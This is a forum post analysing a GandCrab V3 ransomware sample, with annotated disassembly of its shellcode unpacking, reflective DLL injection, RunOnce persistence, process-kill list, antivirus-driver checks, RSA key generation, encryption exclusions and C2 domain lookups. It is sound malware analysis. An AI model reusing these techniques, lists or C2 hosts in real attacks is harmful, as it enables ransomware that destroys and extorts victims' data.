首页
社区
课程
招聘
[原创]GANDCRAB V3勒索病毒样本分析
发表于: 2019-9-4 18:03 5810

[原创]GANDCRAB V3勒索病毒样本分析

2019-9-4 18:03
5810

相关文件:

sample.exe:病毒样本

dimuzd.exe:病毒样本复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下的文件

PE_1.exe:脱壳后的病毒样本

PE_2.dll:病毒样本注入到自身的dll

Shellcode:病毒样本解密出来的shellcode

CRAB-DECRYPT.txt:病毒样本释放的文件

1.txt.CRAB:被病毒样本加密后的文件

pidor.bmp:病毒样本设置的桌面背景图片


具体行为:

1:获取计算机用户名,计算机cpu类型,硬盘空间等信息并且创建互斥体防止多开

2:启动一个线程,在本机查找常见的杀毒软件的驱动文件,如果存在则结束运行

3:将样本文件复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下并修改为随机6个字母+“.exe”,并且设置为开机自动启动

4:遍历进程,终止下列进程:

“msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqldnt.exe","mysqldopt.exe","dbeng50.exe","sqbcoreservice.exe","excel.exe","infopath.exe","msaccess.exe","mspub.exe","onenote.exe","outlook.exe","powerpnt.exe","steam.exe","sqlservr.exe","thebat.exe","thebat64.exe","thunderbird.exe","visio.exe","winword.exe","wordpad.exe"

5:生成RSA密钥用于加密文件

6:查询carder.bit, ns2.wowservers.ru carder.bit ,ns1.wowservers.ru服务器地址

7:连接服务器,讲计算机信息,RSA公钥,私钥等信息组合发送

8:遍历磁盘,获取磁盘类型,如果是本地磁盘,网络磁盘,RAM磁盘则感染该磁盘的文件,启动线程加密后缀不是:

.ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .hlp .ldf .icl.icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .them .epack .exe .bat .cmd .CRAB .crab .GDCB .gdcb .gandcrab .yassine_lemmou,并且文件名不是"desktop.ini","autorun.inf","ntuser.dat","iconcache.db","bootsect.bak","boot.ini", "ntuser.dat.log", "thumbs.db", "CRAB-DECRYPT.txt",”*.sql”的文件,并且路径中不含"\ProgramData\", "\IETldCache\", "\Boot\", "\Program Files\","\Tor Browser\",” "Ransomware"” "\All Users\", "\Local Settings\","\Windows\".其它系统特殊文件夹,加密后的后缀改成. CRAB,并在被加密的文件路径目录及桌面生成CRAB-DECRYPT.txt

9:设置桌面背景图片为prdor.bmp

10:倒计时60秒关闭计算机机




分析记录:


解密出shellcode并执行

0040174D  |.  50            push    eax                              ; /pOldProtect

0040174E  |.  FF75 FC       push    dword ptr [ebp-4]                ; |NewProtect

00401751  |.  FF35 30634601 push    dword ptr [1466330]              ; |Size = 1A884 (108676.)

00401757  |.  FF35 E8214600 push    dword ptr [4621E8]               ; |Address = 00175A60

0040175D  |.  FF15 34E04000 call    dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect

00401763  |.  A1 E8214600   mov     eax, dword ptr [4621E8]

00401768  |.  8B1D 30634601 mov     ebx, dword ptr [1466330]

0040176E  |.  8B3D C0404100 mov     edi, dword ptr [4140C0]

00401774  |.  56            push    esi                              ; /lParam

00401775  |.  56            push    esi                              ; |wParam

00401776  |.  56            push    esi                              ; |Message

00401777  |.  56            push    esi                              ; |hWnd

00401778  |.  8945 F8       mov     dword ptr [ebp-8], eax           ; |

0040177B  |.  FF15 4CE14000 call    dword ptr [<&USER32.PostMessageA>; \PostMessageA

00401781  |.  53            push    ebx

00401782  |.  FF75 F8       push    dword ptr [ebp-8]

00401785  |.  893D E4214600 mov     dword ptr [4621E4], edi

0040178B  |.  E8 B9FCFFFF   call    00401449                         ;  shellcode解密函数

00401790  |.  90            nop

00401791  |.  8105 30634601>add     dword ptr [1466330], 388B2AFF

0040179B  |.  FF15 E8214600 call    dword ptr [4621E8]                 ;执行

地址00175A98和00175A9A处是两条花指令,nop掉即可,或者单步到00175A93时,按F8,否则od容易跑飞

00175A82    50              push    eax

00175A83    8D45 D8         lea     eax, dword ptr [ebp-28]

00175A86    50              push    eax

00175A87    8D45 A0         lea     eax, dword ptr [ebp-60]

00175A8A    50              push    eax

00175A8B    E8 0A080000     call    0017629A

00175A90    83C4 0C         add     esp, 0C

00175A93    E8 04000000     call    00175A9C

00175A98    0000            add     byte ptr [eax], al

00175A9A    0000            add     byte ptr [eax], al

00175A9C    58              pop     eax

00175A9D    8985 74FFFFFF   mov     dword ptr [ebp-8C], eax

00175AA3    8B00            mov     eax, dword ptr [eax]

00175AA5    85C0            test    eax, eax

将shellcede复制到自己程序的代码段并执行入口函数

00175D57    8B45 FC         mov     eax, dword ptr [ebp-4]

00175D5A    8985 4CFFFFFF   mov     dword ptr [ebp-B4], eax

00175D60    8B85 4CFFFFFF   mov     eax, dword ptr [ebp-B4]

00175D66    FF70 10         push    dword ptr [eax+10]               ; 0000CA00

00175D69    8B85 4CFFFFFF   mov     eax, dword ptr [ebp-B4]

00175D6F    8B4D F0         mov     ecx, dword ptr [ebp-10]

00175D72    0348 14         add     ecx, dword ptr [eax+14]

00175D75    51              push    ecx                              ; 01A50400 一段shellcode

00175D76    8B85 4CFFFFFF   mov     eax, dword ptr [ebp-B4]

00175D7C    8B8D 70FFFFFF   mov     ecx, dword ptr [ebp-90]

00175D82    0348 0C         add     ecx, dword ptr [eax+C]

00175D85    51              push    ecx                              ; 00401000

00175D86    E8 CB080000     call    00176656

0017626A    FF75 C0         push    dword ptr [ebp-40]

0017626D    FF55 D4         call    dword ptr [ebp-2C]

00176270    59              pop     ecx

00176271    8B85 60FFFFFF   mov     eax, dword ptr [ebp-A0]

00176277    8B40 0D         mov     eax, dword ptr [eax+D]

0017627A    8985 64FFFFFF   mov     dword ptr [ebp-9C], eax

00176280    8B85 64FFFFFF   mov     eax, dword ptr [ebp-9C]

00176286    0385 70FFFFFF   add     eax, dword ptr [ebp-90]

0017628C    C9              leave

0017628D  - FFE0            jmp     eax                              ; sample.00401612  到达OEP

反射式dll注入自身并调用入口点

004011BD  |> \8B89 C8424100 mov     ecx, dword ptr [ecx+4142C8]

004011C3  |.  53            push    ebx

004011C4  |.  56            push    esi

004011C5  |.  57            push    edi

004011C6  |.  E8 65FFFFFF   call    00401130

004011CB  |.  BF 50424100   mov     edi, 00414250

004011D0  |.  8D1C07        lea     ebx, dword ptr [edi+eax]

004011D3  |.  8B4B 20       mov     ecx, dword ptr [ebx+20]

004011D6  |.  895D FC       mov     dword ptr [ebp-4], ebx

004011D9  |.  E8 52FFFFFF   call    00401130

004011DE  |.  8B4B 24       mov     ecx, dword ptr [ebx+24]

004011E1  |.  8D3407        lea     esi, dword ptr [edi+eax]

004011E4  |.  E8 47FFFFFF   call    00401130

004011E9  |.  8B5B 18       mov     ebx, dword ptr [ebx+18]

004011EC  |.  8BF8          mov     edi, eax

004011EE  |.  81C7 50424100 add     edi, 00414250

004011F4  |.  EB 24         jmp     short 0040121A

004011F6  |>  8B0E          /mov     ecx, dword ptr [esi]

004011F8  |.  4B            |dec     ebx

004011F9  |.  E8 32FFFFFF   |call    00401130

004011FE  |.  05 50424100   |add     eax, 00414250

00401203  |.  68 B81D4100   |push    00411DB8                        ;  ASCII "ReflectiveLoader"

00401208  |.  50            |push    eax

00401209  |.  E8 22040000   |call    00401630

0040120E  |.  59            |pop     ecx

……

00401266   .  8DB8 50424100 lea     edi, dword ptr [eax+414250]

0040126C   .  8D45 E0       lea     eax, dword ptr [ebp-20]

0040126F   .  50            push    eax                              ; /pOldProtect

00401270   .  6A 40         push    40                               ; |NewProtect = PAGE_EXECUTE_READWRITE

00401272   .  68 00300100   push    13000                            ; |Size = 13000 (77824.)

00401277   .  68 50424100   push    00414250                         ; |Address = PE_1.00414250

0040127C   .  FF15 50E04000 call    dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect

00401282   .  85C0          test    eax, eax

00401284   .  74 30         je      short 004012B6

00401286   .  FFD7          call    edi                              ;  PE_1.0041A190

获取计算机信息,用户名,计算机组,计算机系统,硬盘空间等信息

01A24498    C746 04 AC04A30>mov     dword ptr [esi+4], 1A304AC       ; UNICODE "pc_user"

01A2449F    C746 10 9C04A30>mov     dword ptr [esi+10], 1A3049C      ; UNICODE "pc_name"

01A244A6    C746 18 0100000>mov     dword ptr [esi+18], 1

01A244AD    C746 1C 8804A30>mov     dword ptr [esi+1C], 1A30488      ; UNICODE "pc_group"

01A244B4    C746 28 8004A30>mov     dword ptr [esi+28], 1A30480      ; UNICODE "av"

01A244BB    C746 34 7004A30>mov     dword ptr [esi+34], 1A30470      ; UNICODE "pc_lang"

01A244C2    C746 40 6004A30>mov     dword ptr [esi+40], 1A30460      ; UNICODE "pc_keyb"

01A244C9    C746 4C 4C04A30>mov     dword ptr [esi+4C], 1A3044C      ; UNICODE "os_major"

01A244D0    C746 58 3C04A30>mov     dword ptr [esi+58], 1A3043C      ; UNICODE "os_bit"

01A244D7    C746 60 0100000>mov     dword ptr [esi+60], 1

01A244DE    C746 64 2804A30>mov     dword ptr [esi+64], 1A30428      ; UNICODE "ransom_id"

01A244E5    C746 78 2004A30>mov     dword ptr [esi+78], 1A30420      ; UNICODE "hdd"

01A244EC    8986 80000000   mov     dword ptr [esi+80], eax

01A244F2    C786 88000000 1>mov     dword ptr [esi+88], 1A30418      ; UNICODE "ip"

01A244FC    FF15 78B1A201   call    dword ptr [1A2B178]              ; kernel32.GetProcessHeap

……

01A2810C    8946 08         mov     dword ptr [esi+8], eax

01A2810F    51              push    ecx

01A28110    50              push    eax

01A28111    C745 EC 0001000>mov     dword ptr [ebp-14], 100

01A28118    FF15 4CB0A201   call    dword ptr [1A2B04C]              ; advapi32.GetUserNameW

01A2811E    837E 0C 00      cmp     dword ptr [esi+C], 0

01A28122    74 22           je      short 01A28146

01A28124    6A 04           push    4

01A28126    68 00300000     push    3000

01A2812B    6A 20           push    20

01A2812D    6A 00           push    0

01A2812F    C745 EC 1E00000>mov     dword ptr [ebp-14], 1E

01A28136    FFD7            call    edi

01A28138    8D4D EC         lea     ecx, dword ptr [ebp-14]

01A2813B    8946 14         mov     dword ptr [esi+14], eax

01A2813E    51              push    ecx

01A2813F    50              push    eax

01A28140    FF15 04B1A201   call    dword ptr [1A2B104]              ; kernel32.GetComputerNameW

01A28146    837E 18 00      cmp     dword ptr [esi+18], 0

……

01A2816F    50              push    eax

01A28170    68 E410A301     push    1A310E4                          ; UNICODE "Domain"

01A28175    68 F810A301     push    1A310F8                          ; UNICODE "SYSTEM\CurrentControlSet\services\Tcpip\Parameters"

01A2817A    68 02000080     push    80000002

01A2817F    E8 DCFEFFFF     call    01A28060

01A28184    85C0            test    eax, eax

01A28186    74 11           je      short 01A28199

01A28188    8B46 20         mov     eax, dword ptr [esi+20]

01A2818B    66:8338 00      cmp     word ptr [eax], 0

01A2818F    75 15           jnz     short 01A281A6

01A28191    68 6011A301     push    1A31160                          ; UNICODE "WORKGROUP"

01A28196    50              push    eax

01A28197    EB 08           jmp     short 01A281A1

创建互斥体,互斥体名为获取到的计算机信息。如果互斥体存在则结束本进程

01AB5169    68 FC04AC01     push    1AC04FC                          ; UNICODE "Global\"

01AB516E    56              push    esi

01AB516F    FF15 84B1AB01   call    dword ptr [1ABB184]              ; kernel32.lstrcpyW

01AB5175    56              push    esi

01AB5176    FF15 40B1AB01   call    dword ptr [1ABB140]              ; kernel32.lstrlenW

01AB517C    8D4C24 10       lea     ecx, dword ptr [esp+10]

01AB5180    8D0446          lea     eax, dword ptr [esi+eax*2]

01AB5183    50              push    eax

01AB5184    E8 672B0000     call    01AB7CF0

01AB5189  56                push    esi     ; MutexName = "Global\pc_group=WORKGROUP&ransom_id=6aa1d5d1fc51543e

01AB518A    6A 00           push    0

01AB518C    6A 00           push    0

01AB518E    FF15 80B1AB01   call    dword ptr [1ABB180]              ; kernel32.CreateMutexW

将自身复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下,文件名为随机6个字母。

01AB289E    53              push    ebx

01AB289F    53              push    ebx

01AB28A0    6A 03           push    3

01AB28A2    53              push    ebx

01AB28A3    6A 01           push    1

01AB28A5    68 00000080     push    80000000

01AB28AA    51              push    ecx

01AB28AB    FF15 48B1AB01   call    dword ptr [1ABB148]              ; kernel32.CreateFileW

01AB28B1    8BF8            mov     edi, eax

01AB28B3    83FF FF         cmp     edi, -1

01AB28B6    74 41           je      short 01AB28F9

01AB28B8    53              push    ebx

01AB28B9    57              push    edi

01AB28BA    FF15 60B1AB01   call    dword ptr [1ABB160]              ; kernel32.GetFileSize

01AB28C0    8945 FC         mov     dword ptr [ebp-4], eax

01AB28C3    E8 18080000     call    01AB30E0

01AB28E3    53              push    ebx

01AB28E4    57              push    edi

01AB28E5    FF15 3CB1AB01   call    dword ptr [1ABB13C]              ; kernel32.CreateFileMappingW

01AB28EB    8945 F4         mov     dword ptr [ebp-C], eax

01AB28EE    85C0            test    eax, eax

修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce添加项“fadophupyvl,“

数据”C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe ”

01AB2ACB    6A 00           push    0

01AB2ACD    8D45 FC         lea     eax, dword ptr [ebp-4]

01AB2AD0    50              push    eax

01AB2AD1    6A 00           push    0

01AB2AD3    68 3F000F00     push    0F003F

01AB2AD8    6A 00           push    0

01AB2ADA    6A 00           push    0

01AB2ADC    6A 00           push    0

01AB2ADE    8D85 78FFFFFF   lea     eax, dword ptr [ebp-88]

01AB2AE4    50              push    eax                              ; SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

01AB2AE5    68 02000080     push    80000002

01AB2AEA    FF15 00B0AB01   call    dword ptr [1ABB000]              ; advapi32.RegCreateKeyExW

01AB2AF0    85C0            test    eax, eax

01AB2AF2    75 32           jnz     short 01AB2B26

01AB2AF4    57              push    edi

01AB2AF5    FF15 40B1AB01   call    dword ptr [1ABB140]              ; kernel32.lstrlenW

01AB2AFB    03C0            add     eax, eax

01AB2AFD    50              push    eax

01AB2AFE    57              push    edi   ;   "C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe"

01AB2AFF    6A 01           push    1

01AB2B01    6A 00           push    0

01AB2B03    8D45 E4         lea     eax, dword ptr [ebp-1C]

01AB2B06    50              push    eax                              ; ValueName = "cozfgrboyac"

01AB2B07    FF75 FC         push    dword ptr [ebp-4]                ; hKey = AC

01AB2B0A    FF15 08B0AB01   call    dword ptr [1ABB008]              ; advapi32.RegSetValueExW

遍历进程,结束掉进程名为:

“msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqldnt.exe","mysqldopt.exe","dbeng50.exe","sqbcoreservice.exe","excel.exe","infopath.exe","msaccess.exe","mspub.exe","onenote.exe","outlook.exe","powerpnt.exe","steam.exe","sqlservr.exe","thebat.exe","thebat64.exe","thunderbird.exe","visio.exe","winword.exe","wordpad.exe"的进程

01AB51F3    C74424 18 0C05A>mov     dword ptr [esp+18], 1AC050C      ; UNICODE "msftesql.exe"

01AB51FB    C74424 1C 2805A>mov     dword ptr [esp+1C], 1AC0528      ; UNICODE "sqlagent.exe"

01AB5203    C74424 20 4405A>mov     dword ptr [esp+20], 1AC0544      ; UNICODE "sqlbrowser.exe"

01AB520B    C74424 24 6405A>mov     dword ptr [esp+24], 1AC0564      ; UNICODE "sqlservr.exe"

01AB5213    C74424 28 8005A>mov     dword ptr [esp+28], 1AC0580      ; UNICODE "sqlwriter.exe"

01AB521B    C74424 2C 9C05A>mov     dword ptr [esp+2C], 1AC059C      ; UNICODE "oracle.exe"

01AB5223    C74424 30 B405A>mov     dword ptr [esp+30], 1AC05B4      ; UNICODE "ocssd.exe"

01AB522B    C74424 34 C805A>mov     dword ptr [esp+34], 1AC05C8      ; UNICODE "dbsnmp.exe"

01AB5233    C74424 38 E005A>mov     dword ptr [esp+38], 1AC05E0      ; UNICODE "synctime.exe"

01AB523B    C74424 3C FC05A>mov     dword ptr [esp+3C], 1AC05FC      ; UNICODE "mydesktopqos.exe"

01AB5243    C74424 40 2006A>mov     dword ptr [esp+40], 1AC0620      ; UNICODE "agntsvc.exeisqlplussvc.exe"

01AB524B    C74424 44 5806A>mov     dword ptr [esp+44], 1AC0658      ; UNICODE "xfssvccon.exe"

01AB5253    C74424 48 7406A>mov     dword ptr [esp+48], 1AC0674      ; UNICODE "mydesktopservice.exe"

01AB525B    C74424 4C A006A>mov     dword ptr [esp+4C], 1AC06A0      ; UNICODE "ocautoupds.exe"

01AB5263    C74424 50 C006A>mov     dword ptr [esp+50], 1AC06C0      ; UNICODE "agntsvc.exeagntsvc.exe"

01AB526B    C74424 54 F006A>mov     dword ptr [esp+54], 1AC06F0      ; UNICODE "agntsvc.exeencsvc.exe"

01AB5273    C74424 58 1C07A>mov     dword ptr [esp+58], 1AC071C      ; UNICODE "firefoxconfig.exe"

01AB527B    C74424 5C 4007A>mov     dword ptr [esp+5C], 1AC0740      ; UNICODE "tbirdconfig.exe"

01AB5283    C74424 60 6007A>mov     dword ptr [esp+60], 1AC0760      ; UNICODE "ocomm.exe"

01AB528B    C74424 64 7407A>mov     dword ptr [esp+64], 1AC0774      ; UNICODE "mysqld.exe"

01AB5293    C74424 68 8C07A>mov     dword ptr [esp+68], 1AC078C      ; UNICODE "mysqld-nt.exe"

01AB529B    C74424 6C A807A>mov     dword ptr [esp+6C], 1AC07A8      ; UNICODE "mysqld-opt.exe"

01AB52A3    C74424 70 C807A>mov     dword ptr [esp+70], 1AC07C8      ; UNICODE "dbeng50.exe"

01AB52AB    C74424 74 E007A>mov     dword ptr [esp+74], 1AC07E0      ; UNICODE "sqbcoreservice.exe"

01AB52B3    C74424 78 0808A>mov     dword ptr [esp+78], 1AC0808      ; UNICODE "excel.exe"

01AB52BB    C74424 7C 1C08A>mov     dword ptr [esp+7C], 1AC081C      ; UNICODE "infopath.exe"

01AB52C3    C78424 80000000>mov     dword ptr [esp+80], 1AC0838      ; UNICODE "msaccess.exe"

01AB52CE    C78424 84000000>mov     dword ptr [esp+84], 1AC0854      ; UNICODE "mspub.exe"

01AB52D9    C78424 88000000>mov     dword ptr [esp+88], 1AC0868      ; UNICODE "onenote.exe"

01AB52E4    C78424 8C000000>mov     dword ptr [esp+8C], 1AC0880      ; UNICODE "outlook.exe"

01AB52EF    C78424 90000000>mov     dword ptr [esp+90], 1AC0898      ; UNICODE "powerpnt.exe"

01AB52FA    C78424 94000000>mov     dword ptr [esp+94], 1AC08B4      ; UNICODE "steam.exe"

01AB5305    C78424 98000000>mov     dword ptr [esp+98], 1AC0564      ; UNICODE "sqlservr.exe"

01AB5310    C78424 9C000000>mov     dword ptr [esp+9C], 1AC08C8      ; UNICODE "thebat.exe"

01AB531B    C78424 A0000000>mov     dword ptr [esp+A0], 1AC08E0      ; UNICODE "thebat64.exe"

01AB5326    C78424 A4000000>mov     dword ptr [esp+A4], 1AC08FC      ; UNICODE "thunderbird.exe"

01AB5331    C78424 A8000000>mov     dword ptr [esp+A8], 1AC091C      ; UNICODE "visio.exe"

01AB533C    C78424 AC000000>mov     dword ptr [esp+AC], 1AC0930      ; UNICODE "winword.exe"

01AB5347    C78424 B0000000>mov     dword ptr [esp+B0], 1AC0948      ; UNICODE "wordpad.exe"

01AB5352    FF15 D8B0AB01   call    dword ptr [1ABB0D8]              ; kernel32.CreateToolhelp32Snapshot

01AB5358    6A 04           push    4

01AB535A    68 00300000     push    3000

01AB535F    68 2C020000     push    22C

01AB5364    8BF0            mov     esi, eax

01AB5366    6A 00           push    0

01AB5368    897424 1C       mov     dword ptr [esp+1C], esi

01AB536C    FF15 70B1AB01   call    dword ptr [1ABB170]              ; kernel32.VirtualAlloc

01AB5372    8BD8            mov     ebx, eax

01AB5374    85DB            test    ebx, ebx

01AB5376    74 13           je      short 01AB538B

01AB5378    C703 2C020000   mov     dword ptr [ebx], 22C

01AB537E    83FE FF         cmp     esi, -1

01AB5381    74 08           je      short 01AB538B

01AB5383    53              push    ebx

01AB5384    56              push    esi

01AB5385    FF15 D0B0AB01   call    dword ptr [1ABB0D0]              ; kernel32.Process32FirstW

01AB538B    8B3D E0B0AB01   mov     edi, dword ptr [1ABB0E0]         ; kernel32.CloseHandle

01AB5391    8D4B 24         lea     ecx, dword ptr [ebx+24]

01AB5394    33F6            xor     esi, esi

01AB5396    EB 08           jmp     short 01AB53A0

01AB5398    8DA424 00000000 lea     esp, dword ptr [esp]

01AB539F    90              nop

01AB53A0    51              push    ecx

01AB53A1    FF74B4 14       push    dword ptr [esp+esi*4+14]

01AB53A5    FF15 38B1AB01   call    dword ptr [1ABB138]              ; kernel32.lstrcmpiW

01AB53AB    85C0            test    eax, eax

01AB53AD    75 2C           jnz     short 01AB53DB

01AB53AF    FF73 08         push    dword ptr [ebx+8]

01AB53B2    50              push    eax

01AB53B3    6A 01           push    1

01AB53B5    FF15 1CB1AB01   call    dword ptr [1ABB11C]              ; kernel32.OpenProcess

01AB53BB    8BF8            mov     edi, eax

01AB53BD    85FF            test    edi, edi

01AB53BF    74 14           je      short 01AB53D5

01AB53C1    6A 00           push    0

01AB53C3    57              push    edi

01AB53C4    FF15 A4B0AB01   call    dword ptr [1ABB0A4]              ; kernel32.TerminateProcess

01AB53CA    57              push    edi

01AB53CB    8B3D E0B0AB01   mov     edi, dword ptr [1ABB0E0]         ; kernel32.CloseHandle

01AB53D1    FFD7            call    edi

01AB53D3    EB 06           jmp     short 01AB53DB

01AB53D5    8B3D E0B0AB01   mov     edi, dword ptr [1ABB0E0]         ; kernel32.CloseHandle

01AB53DB    46              inc     esi

01AB53DC    8D4B 24         lea     ecx, dword ptr [ebx+24]

01AB53DF    83FE 27         cmp     esi, 27

01AB53E2  ^ 72 BC           jb      short 01AB53A0

01AB53E4    8B7424 0C       mov     esi, dword ptr [esp+C]

01AB53E8    53              push    ebx

01AB53E9    56              push    esi

01AB53EA    FF15 D4B0AB01   call    dword ptr [1ABB0D4]              ; kernel32.Process32NextW

01AB5411    5D              pop     ebp

01AB5412    C3              retn

生成RSA密钥

01A26F30    55              push    ebp

01A26F31    8BEC            mov     ebp, esp

01A26F33    83EC 0C         sub     esp, 0C

01A26F36    68 000000F0     push    F0000000

01A26F3B    6A 01           push    1

01A26F3D    68 D80DA301     push    1A30DD8                          ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"

01A26F42    6A 00           push    0

01A26F44    8D45 FC         lea     eax, dword ptr [ebp-4]

01A26F47    50              push    eax

01A26F48    FF15 20B0A201   call    dword ptr [1A2B020]              ; advapi32.CryptAcquireContextW

01A26F4E    85C0            test    eax, eax

01A26F50    75 36           jnz     short 01A26F88

01A26F52    FF15 88B1A201   call    dword ptr [1A2B188]              ; ntdll.RtlGetLastWin32Error

01A26F58    3D 16000980     cmp     eax, 80090016

01A26F5D    75 22           jnz     short 01A26F81

01A26F5F    6A 08           push    8

01A26F61    6A 01           push    1

01A26F63    68 D80DA301     push    1A30DD8                          ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"

01A26F68    6A 00           push    0

01A26F6A    8D4D FC         lea     ecx, dword ptr [ebp-4]

01A26F6D    51              push    ecx

01A26F6E    FF15 20B0A201   call    dword ptr [1A2B020]              ; advapi32.CryptAcquireContextW

01A26F74    85C0            test    eax, eax

01A26F76    75 07           jnz     short 01A26F7F

01A26F78    33C0            xor     eax, eax

01A26F7A    E9 8D000000     jmp     01A2700C

01A26F7F    EB 07           jmp     short 01A26F88

01A26F81    33C0            xor     eax, eax

01A26F83    E9 84000000     jmp     01A2700C

01A26F88    8D55 F8         lea     edx, dword ptr [ebp-8]

01A26F8B    52              push    edx

01A26F8C    68 01000008     push    8000001

01A26F91    68 00A40000     push    0A400

01A26F96    8B45 FC         mov     eax, dword ptr [ebp-4]

01A26F99    50              push    eax

01A26F9A    FF15 34B0A201   call    dword ptr [1A2B034]              ; advapi32.CryptGenKey

01A26FA0    85C0            test    eax, eax

01A26FA2    75 01           jnz     short 01A26FA5

01A26FA4    90              nop

01A26FA5    C745 F4 0000000>mov     dword ptr [ebp-C], 0

01A26FAC    8B4D 0C         mov     ecx, dword ptr [ebp+C]

01A26FAF    51              push    ecx

01A26FB0    8B55 08         mov     edx, dword ptr [ebp+8]

01A26FB3    52              push    edx

01A26FB4    6A 00           push    0

01A26FB6    6A 06           push    6

01A26FB8    6A 00           push    0

01A26FBA    8B45 F8         mov     eax, dword ptr [ebp-8]

01A26FBD    50              push    eax

01A26FBE    FF15 1CB0A201   call    dword ptr [1A2B01C]              ; advapi32.CryptExportKey

01A26FC4    8B4D 14         mov     ecx, dword ptr [ebp+14]

01A26FC7    51              push    ecx

01A26FC8    8B55 10         mov     edx, dword ptr [ebp+10]

01A26FCB    52              push    edx

01A26FCC    6A 00           push    0

01A26FCE    6A 07           push    7

01A26FD0    6A 00           push    0

01A26FD2    8B45 F8         mov     eax, dword ptr [ebp-8]

01A26FD5    50              push    eax

01A26FD6    FF15 1CB0A201   call    dword ptr [1A2B01C]              ; advapi32.CryptExportKey

01A26FDC    8B4D F8         mov     ecx, dword ptr [ebp-8]

01A26FDF    51              push    ecx

01A26FE0    FF15 38B0A201   call    dword ptr [1A2B038]              ; advapi32.CryptDestroyKey

01A26FE6    6A 00           push    0

01A26FE8    8B55 FC         mov     edx, dword ptr [ebp-4]

01A26FEB    52              push    edx

01A26FEC    FF15 28B0A201   call    dword ptr [1A2B028]              ; advapi32.CryptReleaseContext

01A26FF2    6A 10           push    10

01A26FF4    6A 01           push    1

01A26FF6    68 D80DA301     push    1A30DD8                          ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"

01A26FFB    6A 00           push    0

01A26FFD    8D45 FC         lea     eax, dword ptr [ebp-4]

01A27000    50              push    eax

01A27001    FF15 20B0A201   call    dword ptr [1A2B020]              ; advapi32.CryptAcquireContextW

01A27007    B8 01000000     mov     eax, 1

查找驱动程序klif.sys,kl1.sys,fsdfw.sys,srtsp.sys,srtsp64.sys,NavEx15.sys,NavEng.sys,如果存在则退出(一些杀软常见的驱动)

01AB2DF6    8D4C24 1C   lea     ecx, dword ptr [esp+1C]

01AB2DFA    C74424 20 6>mov     dword ptr [esp+20], 660069

01AB2E02    C74424 24 2>mov     dword ptr [esp+24], 73002E

01AB2E0A    C74424 28 7>mov     dword ptr [esp+28], 730079

01AB2E12    66:894424 2>mov     word ptr [esp+2C], ax

01AB2E17    C74424 0C 6>mov     dword ptr [esp+C], 6C006B

01AB2E1F    C74424 10 3>mov     dword ptr [esp+10], 2E0031

01AB2E27    C74424 14 7>mov     dword ptr [esp+14], 790073

01AB2E2F    C74424 18 7>mov     dword ptr [esp+18], 73           ; klif.sys

01AB2E37    E8 C4010000 call    01AB3000

01AB2E3C    85C0        test    eax, eax

01AB2E3E    75 59       jnz     short 01AB2E99

01AB2E40    8D4C24 0C   lea     ecx, dword ptr [esp+C]           ; kl1.sys

01AB2E44    E8 B7010000 call    01AB3000

01AB2E49    85C0        test    eax, eax

01AB2E4B    75 4C       jnz     short 01AB2E99

01AB2E4D    8D4C24 1C   lea     ecx, dword ptr [esp+1C]

01AB2E51    C74424 1C 6>mov     dword ptr [esp+1C], 730066

01AB2E59    C74424 20 6>mov     dword ptr [esp+20], 660064

01AB2E61    C74424 24 7>mov     dword ptr [esp+24], 2E0077

01AB2E69    C74424 28 7>mov     dword ptr [esp+28], 790073

01AB2E71    C74424 2C 7>mov     dword ptr [esp+2C], 73           ; fsdfw.sys

01AB2E79    E8 82010000 call    01AB3000

……

01AB31E3    C745 DC 6E0>mov     dword ptr [ebp-24], 67006E

01AB31EA    C745 E0 2E0>mov     dword ptr [ebp-20], 73002E

01AB31F1    C745 E4 790>mov     dword ptr [ebp-1C], 730079

01AB31F8    66:8945 E8  mov     word ptr [ebp-18], ax            ; srtsp.sys

01AB31FC    E8 FFFDFFFF call    01AB3000

……

01AB3208    8D4D BC     lea     ecx, dword ptr [ebp-44]          ; srtsp64.sys

01AB320B    E8 F0FDFFFF call    01AB3000

01AB3210    85C0        test    eax, eax

01AB3212    75 1C       jnz     short 01AB3230

01AB3214    8D4D A4     lea     ecx, dword ptr [ebp-5C]          ; NavEx15.sys

01AB3217    E8 E4FDFFFF call    01AB3000

01AB321C    85C0        test    eax, eax

01AB321E    75 10       jnz     short 01AB3230

01AB3220    8D4D D4     lea     ecx, dword ptr [ebp-2C]          ; NavEng.sys

01AB3223    E8 D8FDFFFF call    01AB3000

创建进程nslookup.exe,查询carder.bit, ns2.wowservers.ru carder.bit ,ns1.wowservers.ru服务器地址,但是服务器挂了,所以未查询成功

01AB5D31    68 E8030000     push    3E8

01AB5D36    FF15 A0B0AB01   call    dword ptr [1ABB0A0]              ; kernel32.Sleep

01AB5D3C    6A 04           push    4

01AB5D3E    68 00300000     push    3000

01AB5D43    53              push    ebx

01AB5D44    FF15 40B1AB01   call    dword ptr [1ABB140]              ; kernel32.lstrlenW


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

